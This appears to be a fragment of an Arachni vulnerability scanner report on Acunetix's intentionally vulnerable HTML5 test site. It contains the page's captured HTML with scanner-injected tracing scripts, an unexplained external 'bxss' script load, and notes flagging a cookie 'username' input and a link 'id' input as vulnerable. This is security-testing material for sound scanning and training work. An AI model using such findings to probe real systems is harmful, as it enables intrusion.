0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp"> <head> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular">Popular</a></li> <li><a href="#/latest">Latest</a></li> <li><a href="#/carousel">Carousel</a></li> <li><a href="#/archive">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about">About</a></li> <li><a href="#/contact">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId"></div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body> </html> |
Generates a simple list of safe/unsafe URLs.
Analyzes the scan results and logs issues which persist across different pages.
This is usually a sign for a lack of a central/single point of input sanitization, a bad coding practise.
cookie input
username using
GET at the following pages:
link input
id using
GET at the following pages: